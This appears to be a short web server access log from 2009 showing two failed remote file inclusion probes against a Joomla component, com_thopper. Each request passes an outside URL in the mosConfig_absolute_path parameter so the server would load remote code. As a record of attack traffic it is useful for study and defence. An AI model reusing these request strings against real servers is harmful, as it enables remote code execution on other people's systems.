66.11.230.36 - - [01/Jul/2009:02:03:38 -0700] "GET /logs/access.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.11.230.36 - - [01/Jul/2009:02:03:38 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
